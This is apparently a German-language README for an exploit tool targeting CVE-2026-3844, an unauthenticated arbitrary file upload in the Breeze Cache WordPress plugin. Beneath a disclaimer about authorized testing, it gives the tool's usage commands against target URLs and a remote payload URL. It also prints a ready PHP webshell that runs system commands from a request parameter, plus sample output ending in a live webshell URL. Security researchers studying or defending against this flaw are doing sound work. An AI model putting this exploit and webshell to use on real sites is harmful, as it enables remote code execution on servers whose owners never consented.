
WordPress – Breeze Cache <= 2.4.4 – Nicht authentifizierter beliebiger Datei-Upload
DIESES TOOL WIRD NUR FÜR BILDUNGS- UND SICHERHEITSFORSCHUNGSZWECKE BEREITGESTELLT.
Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf
Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden.
CVE-2026-3844 ist eine kritische, nicht authentifizierte Schwachstelle für beliebige Datei-Uploads im Breeze Cache-Plugin für WordPress (Versionen ≤ 2.4.4). Das Plugin validiert den srcset-Parameter in Kommentaren nicht ordnungsgemäß, wodurch entfernte Angreifer bösartige Dateien (einschließlich Webshells) auf den Server hochladen können.
Die Schwachstelle nutzt die Gravatar-Caching-Funktionalität in Breeze aus. Wenn ein Kommentar mit einem speziell gestalteten srcset-Parameter veröffentlicht wird, der eine entfernte Datei-URL enthält, lädt Breeze die Datei herunter und speichert sie lokal unter:
/wp-content/cache/breeze-extra/gravatars/[random_marker][dateiendung]
Voraussetzung: Die Option „Host Files Locally - Gravatars" muss in den Breeze-Einstellungen aktiviert sein.
# Repository klonen
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# Abhängigkeiten installieren
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# Prüfen, ob das Ziel verwundbar ist, ohne Ausnutzung
python3 CVE-2026-3844.py -u http://target.com --check-only
# Benutzerdefinierte Payload-URL verwenden
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# Ausgabe in Datei speichern
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# Timeout für langsame Ziele erhöhen
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| Argument | Beschreibung |
|---|---|
-u, --url | Ziel-URL (erforderlich) |
-p, --payload | Entfernte Payload-URL |
--timeout | Anfrage-Timeout in Sekunden (Standard: 15) |
--check-only | Nur prüfen, ob das Ziel verwundbar ist |
-o, --output | Shell-URL in Datei speichern |
Erstellen Sie Ihre eigene Webshell (shell.php):
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
Hosten Sie sie an einem zugänglichen Ort und verwenden Sie dann:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
Der Exploit prüft automatisch auf die Verifizierungszeichenfolge 4356452d323032362d33383434 (hex-kodiert „CVE-2026-3844") in der hochgeladenen Datei, um eine erfolgreiche Ausnutzung zu bestätigen.
[*] PHASE 1: SCHWACHSTELLENBEWERTUNG
[*] Prüfe Breeze-Plugin-Version...
[+] Ziel VERWUNDBAR (Breeze v2.4.4)
[*] PHASE 2: AUSNUTZUNG
[!] ANFORDERUNG: 'Host Files Locally - Gravatars' MUSS AKTIVIERT SEIN
[*] Schritt 1: Sende bösartigen Kommentar...
[+] Kommentar erfolgreich veröffentlicht
[*] Schritt 2: Warte, bis Breeze die Datei cached...
[*] Schritt 3: Prüfe auf hochgeladene Datei...
[+] Datei gefunden unter: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFIZIERUNGSZEICHENFOLGE GEFUNDEN - EXPLOIT ERFOLGREICH!
[✓] STATUS: ERFOLG
[✓] WEBSHELL-URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # Haupt-Exploit-Skript
├── README.md # Diese Datei
└── LICENSE # MIT-Lizenz
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE-Datei für Details.
Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen Stern ⭐ auf GitHub!